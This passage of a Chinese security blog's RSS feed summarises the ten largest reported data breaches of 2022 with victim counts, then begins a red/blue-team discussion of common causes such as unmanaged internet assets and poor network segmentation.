<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>宽字节安全</title>
    <link>https://wechat2rss.xlab.app/feed/2b4f112d9e25f5ef0abf85e6b31f7d02602672ab.xml</link>
    <description>二十年专注安全研究，漏洞分析&#xA;(wechat feed made by @ttttmr https://wechat2rss.xlab.app)</description>
    <managingEditor> (宽字节安全)</managingEditor>
    <image>
      <url>https://wx.qlogo.cn/mmhead/Q3auHgzwzM41BKRqZxM6ESrdsYW8HHyicBWnjz1Fr53a9SULHcraK3Q/0</url>
      <title>宽字节安全</title>
      <link>https://wechat2rss.xlab.app/feed/2b4f112d9e25f5ef0abf85e6b31f7d02602672ab.xml</link>
    </image>
    <item>
      <title>万字长文：盘点2022全球10大数据泄漏事件（红蓝攻防角度）- 文末福利抽奖</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485718&amp;idx=1&amp;sn=83afc291c76a0f9614181975b13959cc</link>
      <description>导读：全球每年都会有大量的爆炸性的数据泄漏事件发生，但是今年的数据泄漏事件特别多，此起彼伏，而且数据泄漏的规</description>
      <content:encoded><![CDATA[<p>
<span>红蓝攻防</span> <span>2022-08-15 21:14</span> <span style="display: inline-block;">河北</span>
</p>

<p>导读：全球每年都会有大量的爆炸性的数据泄漏事件发生，但是今年的数据泄漏事件特别多，此起彼伏，而且数据泄漏的规</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=9e4aa6b1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FLSOjyib5giaVcw6TTXicGmxyq5kYeZBvLiba6UBZj1Apv8ic7TjpS3FVZfvEplagfA8S2o21iaSBkbvmGBIX2Cn77ZiaQ%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section class="mp_profile_iframe_wrp" style="margin-bottom: 0px;" data-mpa-powered-by="yiban.io"><mp-common-profile class="js_uneditable custom_select_card mp_profile_iframe" data-id="MzI5OTk5OTM2Mw==" data-pluginname="mpprofile" data-headimg="http://mmbiz.qpic.cn/mmbiz_png/LSOjyib5giaVdamYdJaibQO4lfuibm78MoBRoHO3NGaDGwWmTmS1h1A2UBp42Xv0A1nhgia0D8IhEW8hibJMB4uAVxPQ/0?wx_fmt=png" data-nickname="大数据DT" data-alias="hzdashuju" data-signature="提供大数据、AI等领域干货学习资源的「宝藏号」，跟50万技术人共同成长，一起玩转大数据、Python、数据分析、数据科学、人工智能！还会有各种好玩又奇葩的数据解读，边学习边吃瓜！" data-from="0" data-is_biz_ban="0"></mp-common-profile></section><section data-role="outer" label="Powered by 135editor.com" style="margin: 0px;padding: 0px;color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><section style="margin: -10px 0px 10px;padding: 0px;max-width: 100%;box-sizing: border-box;line-height: 1.75em;overflow-wrap: break-word !important;"><section style="margin: 0px;padding: 10px;box-sizing: border-box;max-width: 100%;display: inline-block;width: 578px;vertical-align: top;border-width: 0px;background-color: rgba(220, 220, 220, 0.498);overflow-wrap: break-word !important;"><section style="margin: 10px 0px 0px;padding: 0px;max-width: 100%;box-sizing: border-box;overflow-wrap: break-word !important;"><section style="margin: 0px;padding: 0px 8px;max-width: 100%;box-sizing: border-box;font-size: 15px;line-height: 2;color: rgb(127, 127, 127);overflow-wrap: break-word !important;"><p style="margin: 0px;padding: 0px;clear: both;min-height: 1em;max-width: 100%;box-sizing: border-box;letter-spacing: 0px;line-height: 1.75em;overflow-wrap: break-word !important;"><span style="letter-spacing: normal;"><span style="margin: 0px;padding: 0px;"><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;color: rgb(73, 59, 59);">导读：</span></strong></span><span style="color: rgb(73, 59, 59);">全球每年都会有大量的爆炸性的数据泄漏事件发生，但是今年的数据泄漏事件特别多，此起彼伏，而且数据泄漏的规模和造成的破坏性影响，一次比一次大。</span></span></p><p style="margin: 0px;padding: 0px;clear: both;min-height: 1em;color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;line-height: 1.75em;"><br style="margin: 0px;padding: 0px;"/></p><p style="margin: 0px;padding: 0px;clear: both;min-height: 1em;color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;line-height: 1.75em;"><span style="margin: 0px;padding: 0px;color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">根据Identify Theft Research Center中心的数据显示，与2021年同期相比，今年的数据泄漏事件增长了14%，公用事业企业、医疗机构、金融服务公司、制造企业是黑客的首要攻击目标。</span></p></section></section></section></section></section><section data-role="outer" label="edit by 135editor" style="margin: 0px;padding: 0px;"><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="margin: 0px;padding: 0px;color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;line-height: 1.75em;"><span style="margin: 0px;padding: 0px;color: rgb(127, 127, 127);font-size: 14px;letter-spacing: normal;">作者：<span style="color: rgb(127, 127, 127);font-family: 微软雅黑;font-size: 14px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: center;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;display: inline !important;float: none;">红蓝攻防</span></span></section><section style="margin: 0px;padding: 0px;color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;line-height: 1.75em;"><span style="margin: 0px;padding: 0px;color: rgb(127, 127, 127);font-size: 14px;letter-spacing: normal;">来源：大数据DT（ID：hzdashuju）</span></section><section style="margin: 0px;padding: 0px;color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;line-height: 1.75em;"><br/></section></section><section data-role="outer" label="edit by 135editor" style="margin-bottom: 0px;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;"></span></section><p style="text-align: center;margin-bottom: 0em;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.76875" data-s="300,640" style="" data-type="jpeg" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=c322e752&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FLSOjyib5giaVcw6TTXicGmxyq5kYeZBvLibaCWccuxs8xh0zdan2k79QnDTerSBficKACOwIxbLhdhia8oawSl48reZA%2F640%3Fwx_fmt%3Djpeg"/></p><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">本文主要讲解3个方面的内容：</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><ol class="list-paddingleft-1" style="list-style-type: decimal;"><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">简单梳理2022年上半年全球最大的10起数据泄漏事件；</span></section></li><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">从红蓝攻防的角度去分析这些数据泄漏事件背后的原因；</span></section></li><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">从红蓝攻防的角度为企业如何保护好自己的数据给出几点建议。</span></section></li></ol><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="color: rgb(0, 122, 170);font-size: 18px;">01 2022年全球10大数据泄漏事件</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">根据国内知名媒体ZDNet的报道，今年全球发生了如下10起数据泄漏事件，根据数据泄漏规模和影响力倒序排列：</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">NO.10 美国德克萨斯州圣安东尼奥医疗中心</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><ul class="list-paddingleft-1" style="list-style-type: circle;"><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(127, 127, 127);font-size: 14px;letter-spacing: normal;">受影响的人数：<strong><span style="font-size: 14px;color: rgb(0, 122, 170);">124万</span></strong></span></section></li></ul><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">6月下旬，位于美国得克萨斯州圣安东尼奥的Baptist Medical Center医疗中心和德克萨斯州新布朗费尔斯的Resolute Health Hospital附属医院发生了重大的数据泄漏事件，该事件是美国卫生与公众服务部最近追踪到的、规模最大的数据泄漏事件之一，其中涉及到未经授权访问高度敏感的患者数据。</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">NO.9 美国旗星银行</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><ul class="list-paddingleft-1" style="list-style-type: circle;"><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;color: rgb(127, 127, 127);font-size: 14px;">受影响的人数：<strong><span style="font-size: 14px;color: rgb(0, 122, 170);">154万</span></strong></span></section></li></ul><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">今年6月，位于密歇根州特洛伊的美国星旗银行称在去年底发生了一次重大数据泄漏事件，客户数据被泄漏，这是该银行发生的第二次数据泄漏事件。</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">NO.8 美国得克萨斯州保险部</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><ul class="list-paddingleft-1" style="list-style-type: circle;"><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;color: rgb(127, 127, 127);font-size: 14px;">受影响的人数：<strong><span style="font-size: 14px;color: rgb(0, 122, 170);">180万</span></strong></span></section></li></ul><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">今年3月，美国德克萨斯州保险部的数据被泄漏，泄漏的敏感数据包括社保号码、出生日期等个人信息。</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">NO.7 希尔兹医疗集团</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><ul class="list-paddingleft-1" style="list-style-type: circle;"><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;color: rgb(127, 127, 127);font-size: 14px;">受影响的人数：<strong><span style="font-size: 14px;color: rgb(0, 122, 170);">200万</span></strong></span></section></li></ul><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">今年6月，总部位于美国马萨诸塞州昆西的希尔兹医疗集团（Shields Health Care Group）数据泄漏，可能影响数十个地区医疗机构约200万人，包括姓名、社保号码和保险信息。</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">NO.6 Horizon Actuarial Services</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><ul class="list-paddingleft-1" style="list-style-type: circle;"><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;color: rgb(127, 127, 127);font-size: 14px;">受影响的人数：<strong><span style="font-size: 14px;color: rgb(0, 122, 170);">229万</span></strong></span></section></li></ul><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">Horizon Actuarial是一家为美国很多工会福利计划提供技术和精算咨询服务的公司，黑客攻陷了这家公司内部的2台服务器，用户的姓名、出生日期、社保号码和健康计划信息遭泄漏，受影响的福利计划包括美国职业棒球大联盟球员福利计划、全国冰球联盟球员协会健康和福利基金、以及纽约时报福利协会。</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">NO.5 Lakeview Loan Servicing</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><ul class="list-paddingleft-1" style="list-style-type: circle;"><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;color: rgb(127, 127, 127);font-size: 14px;">受影响的人数：<strong><span style="font-size: 14px;color: rgb(0, 122, 170);">257万</span></strong></span></section></li></ul><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">位于美国佛罗里达州Coral Gables的Lakeview Loan Servicing的数百万客户的高度敏感信息遭泄漏，在暗网挂牌销售，该公司正面临多起诉讼。</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">NO.4 Elephant Insurance Services</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><ul class="list-paddingleft-1" style="list-style-type: circle;"><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;color: rgb(127, 127, 127);font-size: 14px;">受影响的人数：<strong><span style="font-size: 14px;color: rgb(0, 122, 170);">276万</span></strong></span></section></li></ul><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">今年5月，总部位于美国弗吉尼亚州Henrico的Elephant Insurance ServicesDE 数百万客户的保单信息被泄漏，包括姓名、驾照号码和出生日期等信息。</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">NO.3 FlexBooker</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><ul class="list-paddingleft-1" style="list-style-type: circle;"><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;color: rgb(127, 127, 127);font-size: 14px;">受影响的人数：<strong><span style="font-size: 14px;color: rgb(0, 122, 170);">375万</span></strong></span></section></li></ul><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">今年1月，总部位于美国俄亥俄州哥伦布市的公司FlexBooker（企业网站嵌入在线预约工具提供商）的AWS服务器遭到入侵，用户的信用卡数据等信息遭泄漏。</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">NO.2 Beetle Eye</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><ul class="list-paddingleft-1" style="list-style-type: circle;"><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;color: rgb(127, 127, 127);font-size: 14px;">受影响的人数：<strong><span style="font-size: 14px;color: rgb(0, 122, 170);">700万</span></strong></span></section></li></ul><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">美国的一家提供在线电子邮件营销工具的公司Beetle Eye发生重大数据泄漏，此次事件是由于AWS S3存储桶未进行任何加密且配置错误造成的，该漏洞导致Amazon S3存储桶处于打开状态，泄漏了大约700万人的敏感数据。</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">NO.1 Cash App Investing</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><ul class="list-paddingleft-1" style="list-style-type: circle;"><li style="letter-spacing: normal;"><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;color: rgb(127, 127, 127);font-size: 14px;">受影响的人数：<strong><span style="font-size: 14px;color: rgb(0, 122, 170);">820万</span></strong></span></section></li></ul><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">今年4月，美国知名投资公司Cash App Investing的820万客户数据被泄漏，由一名前员工下载了公司内部的一份报告引起，泄漏的信息包含客户的全名和经纪帐号等信息。</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">其实，最近还有一起数据泄漏事件比上面这10起事件还要劲爆，即欧洲某国领导人与俄罗斯总统普京的通话内容被泄漏，原因是该领导人使用的iPhone被植入了侦听软件。</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">如果仔细分析和追查这些数据泄漏的背后原因，无外乎奇安信出版的畅销书《红蓝攻防：构建实战化的网络安全防御体系》中总结的10个原因。</span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><p style="text-align: center;margin-bottom: 0em;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.69453125" data-s="300,640" style="" data-type="jpeg" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=92c6e3fc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FLSOjyib5giaVcw6TTXicGmxyq5kYeZBvLibasnCBap6lcZ1icxPYaibnaibeX6B4ZuRONbJtFfmnPgRkNDV23VMLKru1g%2F640%3Fwx_fmt%3Djpeg"/></p><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="color: rgb(0, 122, 170);font-size: 18px;">02 导致数据泄漏的10种常见原因</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">NO.1 互联网未知资产/服务大量存在</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">在攻防演练中，资产的控制权和所有权始终是攻防双方的争夺焦点。互联网暴露面作为流量的入口，是攻击方重要的攻击对象。</span></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><span style="color: rgb(73, 59, 59);font-size: 15px;">资产不清是很多政企单位面临的现状。</span><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">数字化转型带来的互联网暴露面不断扩大，政企机构资产范围不断外延。</span></strong><span style="color: rgb(73, 59, 59);font-size: 15px;">除了看得到的“冰面资产”之外，还有大量的冰面之下的资产，包括无主资产、灰色资产、僵尸资产等。</span></span></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">在实战攻防演练中，一些单位存在“年久失修、无开发维护保障”的老/旧/僵尸系统，因为清理不及时，容易成为攻击者的跳板，构成严重的安全隐患。 </span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">NO.2 网络及子网内部安全域之间隔离措施不到位</span></strong></span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="color: rgb(73, 59, 59);font-size: 15px;letter-spacing: normal;">网络内部的隔离措施是考验企业网络安全防护能力的重要环节。由于很多机构没有严格的访问控制（ACL）策略，在DMZ和办公网之间不做或很少有网络隔离，办公网和互联网相通，网络区域划分不严格，可以直接使远程控制程序上线，令攻击方可以很轻易地实现跨区攻击。 </span></section><section style="margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><br/></section><section style="text-align: justify;margin: 0px;padding: 0px;clear: both;min-height: 1em;line-height: 1.75em;"><span style="letter-spacing: normal;"><span style="color: rgb(73, 59, 59);font-size: 15px;">大中型政企机构还存在“一张网”的情况，习惯于使用单独架设专用网络，来打通各地区之间的内部网络连接，不同区域内网间也缺乏必要的隔离管控措施，</span><strong><span style="font-size: 15px;color: rgb(0, 122, 170);">缺乏足够有效的网络访问控制。</span></strong><span style="color: rgb(73, 59, 59);font-size: 15px;">这就导致蓝队一旦突破了子公司或分公司的防线，便可以通过内网进行横向渗透，直接攻击到集团总部，或是漫游整个企业内网，进而攻击任意系统。 </span></span></section><section 